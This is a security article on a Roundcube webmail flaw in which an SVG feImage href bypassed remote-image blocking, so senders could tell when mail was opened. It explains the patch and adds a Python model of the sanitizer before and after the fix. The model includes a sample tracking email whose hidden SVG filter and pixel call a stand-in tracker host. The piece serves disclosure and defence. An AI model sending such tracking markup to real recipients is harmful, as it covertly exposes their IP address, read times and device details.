Roundcube, a widely used open-source webmail application, has released security patches for a privacy vulnerability that let a sender find out when a recipient opened an email, even with remote content blocked.
Understanding the Roundcube Vulnerability
The vulnerability, highlighted by NULL CATHEDRAL, caused remote images embedded in an email to load in the recipient's browser even when the user had configured Roundcube to block them. It affects Roundcube Webmail versions earlier than 1.5.13 and all 1.6.x versions before 1.6.13. The patches, released on February 8, 2026, close the gap.
The issue originated in Roundcube's HTML sanitizer, rcube_washtml, which strips potentially harmful markup from incoming messages before it is rendered. When remote content loading is disabled (allow_remote set to false), the sanitizer has to recognise every attribute through which an element can pull in an external resource. That decision is made by the function is_image_attribute(): an attribute it classifies as an image source (src, or href on the SVG elements it knows about) has any remote URL replaced, so the browser never issues the request.
The Mechanism of Exploitation
The problem arose because the sanitizer did not classify the SVG element feImage as an image source. feImage is an SVG filter primitive that fetches image data through its href attribute, and because HTML tag names are case-insensitive the check has to match it regardless of capitalisation. Since is_image_attribute() did not recognise the element, its href fell through to wash_link(), which treats an href as an ordinary hyperlink: a link is only validated for a safe scheme, not blocked as remote content, so the URL survived sanitisation intact.
This oversight allowed attackers to embed a tiny, invisible SVG in an email. When the message was opened, the filter referenced by the SVG would automatically make a GET request to a server controlled by the attacker. A single request confirms that the address is live and the message was read, and the server log records the recipient's IP address, the time of the open and the browser's User-Agent string, which identifies browser and device.
Implementing the Security Fix
To counteract this vulnerability, the fix updates the regular expression in is_image_attribute() so that an href attribute is treated as an image source on feImage as well as on the image and use elements it already recognised. Any attempt to load an external resource through an SVG filter is now subject to the same remote-content blocking as an ordinary img tag.
Administrators of self-hosted Roundcube instances are strongly advised to upgrade to version 1.5.13 (1.5 branch) or 1.6.13 (1.6 branch) without delay. The bypass defeats precisely the setting that privacy-conscious users rely on, so an instance where remote images are blocked by policy is still exposed until the patch is applied.
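The following Python model, added here as an illustration and not taken from Roundcube's PHP code base, reproduces the logic described above: a minimal washer with remote loading disabled, an is_image_attribute() check in its pre-fix and post-fix forms, and a constructed tracking email carrying an SVG filter whose feImage href points at a hypothetical tracker host (tracker.example). The placeholder image path, the washer's structure and the sample message are all assumptions made for the example; only the decision logic follows the advisory.

```python
"""Model of Roundcube's remote-image blocking, before and after the feImage fix.

Added example, not project code: the parser, placeholder path and sample email
are assumptions; the is_image_attribute() decision logic follows the advisory.
"""
import html
import re
from html.parser import HTMLParser

# Assumption: a local placeholder substituted for blocked remote images.
BLOCKED_IMAGE = "program/resources/blocked.gif"
REMOTE_URL = re.compile(r"^\s*(?:https?:)?//", re.I)      # absolute or protocol-relative
SAFE_LINK = re.compile(r"^\s*(?:https?:|mailto:|#)", re.I)  # schemes a washed link may keep

# Ground truth used only to audit the output: href on these SVG elements is
# resolved by the browser on render, with no user interaction.
AUTO_FETCH_HREF = re.compile(r"^(image|use|feimage)$", re.I)

# Constructed sample: a 1x1 SVG whose filter pulls a remote image via feImage,
# plus a classic tracking pixel and a normal link for contrast.
TRACKING_EMAIL = """<html><body>
<p>Hello,</p>
<svg width="1" height="1" aria-hidden="true">
  <filter id="f"><feImage href="https://tracker.example/open?id=abc123"/></filter>
  <rect width="1" height="1" filter="url(#f)"/>
</svg>
<img src="https://tracker.example/pixel.gif">
<a href="https://example.org/unsubscribe">Unsubscribe</a>
</body></html>"""


def is_image_attribute_before(tag, name):
    """Pre-fix logic: src always loads an image; href only on <image> and <use>."""
    if name == "src":
        return True
    return name in ("href", "xlink:href") and re.match(r"^(image|use)$", tag, re.I) is not None


def is_image_attribute_after(tag, name):
    """Fixed logic: href on <feImage> is an image source too (case-insensitive match)."""
    if name == "src":
        return True
    return name in ("href", "xlink:href") and re.match(r"^(image|use|feimage)$", tag, re.I) is not None


class Washer(HTMLParser):
    """Minimal stand-in for rcube_washtml with allow_remote = false."""

    def __init__(self, image_check):
        super().__init__()
        self.image_check = image_check
        self.out = []
        self.blocked = []  # remote image URLs replaced by the placeholder

    def _wash_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            value = value or ""
            if self.image_check(tag, name):
                if REMOTE_URL.match(value):
                    self.blocked.append(value)
                    value = BLOCKED_IMAGE
            elif name in ("href", "xlink:href"):
                # Modelled wash_link(): a link is kept if its scheme is safe. It
                # is treated as something the user clicks, not as remote content,
                # which is exactly why an unrecognised feImage href slips through.
                if not SAFE_LINK.match(value):
                    continue
            kept.append(f' {name}="{html.escape(value)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._wash_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._wash_attrs(tag, attrs)}/>")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)


def wash(document, image_check):
    """Return (washed_html, blocked_urls) for the given is_image_attribute variant."""
    washer = Washer(image_check)
    washer.feed(document)
    washer.close()
    return "".join(washer.out), washer.blocked


class _FetchFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = value or ""
            if not REMOTE_URL.match(value):
                continue
            if name == "src" or (name in ("href", "xlink:href") and AUTO_FETCH_HREF.match(tag)):
                self.urls.append((tag, name, value))


def auto_fetched_urls(document):
    """Audit: remote URLs a browser would request on render without a click."""
    finder = _FetchFinder()
    finder.feed(document)
    finder.close()
    return finder.urls


if __name__ == "__main__":
    for label, check in (("before fix", is_image_attribute_before),
                         ("after fix", is_image_attribute_after)):
        washed, blocked = wash(TRACKING_EMAIL, check)
        print(f"{label}: blocked {blocked}")
        print(f"  still auto-fetched: {auto_fetched_urls(washed)}")
```

Running the script shows the pre-fix washer blocking only the img tracking pixel while the feImage href survives and would be fetched on render; the post-fix washer replaces both, and the unsubscribe hyperlink is untouched in either case. The same audit function is a cheap way to check any washed output, or a suspect stored message, for SVG elements that still carry an absolute href.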
